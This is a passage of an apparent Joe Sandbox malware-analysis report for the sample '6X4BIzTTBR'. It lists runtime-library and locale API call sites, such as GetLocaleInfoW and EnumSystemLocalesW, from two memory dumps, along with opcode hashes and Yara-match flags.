                                                      • GetACP.KERNEL32(?,?,0470BD04,?,00000000), ref: 0470BABC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                      • Instruction ID: ca43e8098e60e5a497535435f10aecddea60617ed5cb6f0816dee3181132be9e
                                                      • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                      • Instruction Fuzzy Hash: AC212CA2B02205EAD7348FA5D901AA772E6AF44F50B56C564E90AD7391FB32FB40D350
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F49
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F56
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA5E
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0043BAB9
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAC8
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,004307C5,00000040,?,004308E5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB10
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00430845,00000040), ref: 0043BB2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                      • String ID:
                                                      • API String ID: 2287132625-0
                                                      • Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                      • Instruction ID: ae18054f5e49687ad800b44d63d8f6433ac7786c5dbeca376dbf85f879a44531
                                                      • Opcode Fuzzy Hash: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                      • Instruction Fuzzy Hash: B6516171A00605ABDB10EFA5CC45BBF77B8EF4D700F14556BEA04E7290E778DA048BA9
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 047021B0
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021BD
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0470BCC5
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0470BD20
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0470BD2F
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,04700A2C,00000040,?,04700B4C,00000055,00000000,?,?,00000055,00000000), ref: 0470BD77
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,04700AAC,00000040), ref: 0470BD96
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                      • String ID:
                                                      • API String ID: 2287132625-0
                                                      • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                      • Instruction ID: 8ad72cfc96cd1bb8466a152e95d4b61d12ca639ef66056833abaf8ea351c0339
                                                      • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                      • Instruction Fuzzy Hash: 03517F75A01209EAEB10DFE5CC44ABB77F8AF04704F448469E921E72D0EB71FB488B61
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307CC,?,?,?,?,00430223,?,00000004), ref: 0043B0FC
                                                      • _wcschr.LIBVCRUNTIME ref: 0043B18C
                                                      • _wcschr.LIBVCRUNTIME ref: 0043B19A
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307CC,00000000,004308EC), ref: 0043B23D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                      • String ID:
                                                      • API String ID: 2444527052-0
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,04700A33,?,?,?,?,0470048A,?,00000004), ref: 0470B363
                                                      • _wcschr.LIBVCRUNTIME ref: 0470B3F3
                                                      • _wcschr.LIBVCRUNTIME ref: 0470B401
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,04700A33,00000000,04700B53), ref: 0470B4A4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                      • String ID:
                                                      • API String ID: 2444527052-0
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430223,?,00000004), ref: 00435223
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: "1@$GetLocaleInfoEx
                                                      • API String ID: 2299586839-4027230933
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F49
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F56
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B459
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B4AA
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B56A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorInfoLastLocale$_free
                                                      • String ID:
                                                      • API String ID: 2834031935-0
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4DB
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4E5
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4F2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,046DDAED), ref: 046FA742
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,046DDAED), ref: 046FA74C
                                                      • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,046DDAED), ref: 046FA759
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000003,?,0042FE45,00000003,00457970,0000000C,0042FF9C,00000003,00000002,00000000,?,0042DFCF,00000003), ref: 0042FE90
                                                      • TerminateProcess.KERNEL32(00000000,?,0042FE45,00000003,00457970,0000000C,0042FF9C,00000003,00000002,00000000,?,0042DFCF,00000003), ref: 0042FE97
                                                      • ExitProcess.KERNEL32 ref: 0042FEA9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,?,047000AC,00000000,00457970,0000000C,04700203,00000000,00000002,00000000), ref: 047000F7
                                                      • TerminateProcess.KERNEL32(00000000,?,047000AC,00000000,00457970,0000000C,04700203,00000000,00000002,00000000), ref: 047000FE
                                                      • ExitProcess.KERNEL32 ref: 04700110
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$GetProcAddress.$l
                                                      • API String ID: 0-2784972518
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0470048A,?,00000004), ref: 0470548A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: "1@
                                                      • API String ID: 2299586839-1946750398
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      APIs
                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 046D2639
                                                      • PostQuitMessage.USER32(00000000), ref: 046D27DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageNtdllPostProc_QuitWindow
                                                      • String ID:
                                                      • API String ID: 4264772764-0
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CCA,?,?,00000008,?,?,0043F18B,00000000), ref: 00436EFC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04706F31,?,?,00000008,?,?,0470F3F2,00000000), ref: 04707163
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F49
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F56
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B6A9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$InfoLocale
                                                      • String ID:
                                                      • API String ID: 2955987475-0
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 047021B0
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021BD
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0470B910
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free$InfoLocale
                                                      • String ID:
                                                      • API String ID: 2955987475-0
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      • EnumSystemLocalesW.KERNEL32(0043B405,00000001,00000000,?,004307C5,?,0043BA32,00000000,?,?,?), ref: 0043B34F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      • EnumSystemLocalesW.KERNEL32(0043B405,00000001,00000000,?,04700A2C,?,0470BC99,00000000,?,?,?), ref: 0470B5B6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: 1ac9c5adbde53f76e83641c0dce42796ddb1ef626bcd29ef27d6eb2ac8b6d43f
                                                      • Instruction ID: 53fddfa2779af93a751ddf8a8fe6548ff4cb1121cbf19b697e4b47c34b6aaa0f
                                                      • Opcode Fuzzy Hash: 1ac9c5adbde53f76e83641c0dce42796ddb1ef626bcd29ef27d6eb2ac8b6d43f
                                                      • Instruction Fuzzy Hash: 8C11253B2007059FDB189F79C8A56BABBD1FF80318B14842CEA4697B80D771BA03CB40
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B623,00000000,00000000,?), ref: 0043B8B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale_free
                                                      • String ID:
                                                      • API String ID: 787680540-0
                                                      • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                      • Instruction ID: 94b9d1d5490589a6932868e5dfac91813d435d3d1e0b67a6c59256985b2caffb
                                                      • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                      • Instruction Fuzzy Hash: B1F0F932A00115ABDB2CAA65CC057BB775CEB44758F14442FEE05A3240EB79FD41D6D8
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0470B88A,00000000,00000000,?), ref: 0470BB18
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale_free
                                                      • String ID:
                                                      • API String ID: 787680540-0
                                                      • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                      • Instruction ID: 18aab14fc85ce88e2e6ac5ef58d4b43fdb63f13e289238cc0d95f570052e3fb5
                                                      • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                      • Instruction Fuzzy Hash: F6F0F432A01115FBDB289FA5CC49BBA77E8EB40754F048469ED0AA33C4EA70FF0186D4
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      • EnumSystemLocalesW.KERNEL32(0043B655,00000001,?,?,004307C5,?,0043B9F6,004307C5,?,?,?,?,?,004307C5,?,?), ref: 0043B3C4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: 1039935eee4cc737979e506317a8f0900afd51504772cf0596f3d30a1fd47392
                                                      • Instruction ID: b4c9de7f5d4c2c887397eacfa8f9314df51a54e7fbfb40ed20d2d2206768cf55
                                                      • Opcode Fuzzy Hash: 1039935eee4cc737979e506317a8f0900afd51504772cf0596f3d30a1fd47392
                                                      • Instruction Fuzzy Hash: 09F0C2362007045FDB249F3A9C91B6BBB95EF88768F15842EFE068B690D7B59C02C794
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      • EnumSystemLocalesW.KERNEL32(0043B655,00000001,?,?,04700A2C,?,0470BC5D,04700A2C,?,?,?,?,?,04700A2C,?,?), ref: 0470B62B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: b2abb963a5643eab399cd55212bd37e676e64f31586f1ac59a8444abe75cb648
                                                      • Instruction ID: e93c4af3d1882a65ab4111b7ff91c9302296befa2fd48c2f37fff6b9ad305daa
                                                      • Opcode Fuzzy Hash: b2abb963a5643eab399cd55212bd37e676e64f31586f1ac59a8444abe75cb648
                                                      • Instruction Fuzzy Hash: 83F022363007049FEB145FB9CC84B7ABBD0EF8072CF14846DEA058B780D6B1F9028604
                                                      APIs
                                                        • Part of subcall function 0042E3FD: EnterCriticalSection.KERNEL32(?,?,00431C8A,?,00457A38,00000008,00431D58,?,?,?), ref: 0042E40C
                                                      • EnumSystemLocalesW.KERNEL32(00434D97,00000001,00457BB8,0000000C), ref: 00434E15
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: 78c62e35d859f9c5988a6fc2baf0c6bfcff86eb3529ba817c31359ffd6751637
                                                      • Instruction ID: c2e7913d7beef7da917e9693afd21c9eaa4f0891736f125ec479cf6ec0ffb40c
                                                      • Opcode Fuzzy Hash: 78c62e35d859f9c5988a6fc2baf0c6bfcff86eb3529ba817c31359ffd6751637
                                                      • Instruction Fuzzy Hash: 60F04F32A10300DFD714EF69D906B8D37E0EB05716F10416AF920DB2E6CB7999848F49
                                                      APIs
                                                        • Part of subcall function 046FE664: RtlEnterCriticalSection.NTDLL(04280DC5), ref: 046FE673
                                                      • EnumSystemLocalesW.KERNEL32(00434D97,00000001,00457BB8,0000000C), ref: 0470507C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: 763cd6de35ea5bb0f615040600b69c1db79275d5f3fa9e613fc3e2590cfee591
                                                      • Instruction ID: ac3086bbf813b05582860905f1e8387b58057c61c96ea77a0cbca62c141b9af4
                                                      • Opcode Fuzzy Hash: 763cd6de35ea5bb0f615040600b69c1db79275d5f3fa9e613fc3e2590cfee591
                                                      • Instruction Fuzzy Hash: 86F03C32A11304DFE714EF68D905B5D7BE0AB05716F10416AFA10DB2E1DB75A9408B4A
                                                      APIs
                                                        • Part of subcall function 00431EEA: GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                        • Part of subcall function 00431EEA: _free.LIBCMT ref: 00431F21
                                                        • Part of subcall function 00431EEA: SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      • EnumSystemLocalesW.KERNEL32(0043B1E9,00000001,?,?,?,0043BA54,004307C5,?,?,?,?,?,004307C5,?,?,?), ref: 0043B2C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: 13831a7036ebc863385fba09fdbc9a645dd011081cbb64b61d5505cec730fe0a
                                                      • Instruction ID: 0ae1ac0485c1540274cb9d1e02c4d3bc42514ecfd4a0957d517fff15e368931f
                                                      • Opcode Fuzzy Hash: 13831a7036ebc863385fba09fdbc9a645dd011081cbb64b61d5505cec730fe0a
                                                      • Instruction Fuzzy Hash: 44F0E53A30020597CB049F76DC5A76BBF94EFC5764F1A409EEF058B290C77A9942C794
                                                      APIs
                                                        • Part of subcall function 04702151: GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                        • Part of subcall function 04702151: _free.LIBCMT ref: 04702188
                                                        • Part of subcall function 04702151: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      • EnumSystemLocalesW.KERNEL32(0043B1E9,00000001,?,?,?,0470BCBB,04700A2C,?,?,?,?,?,04700A2C,?,?,?), ref: 0470B530
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
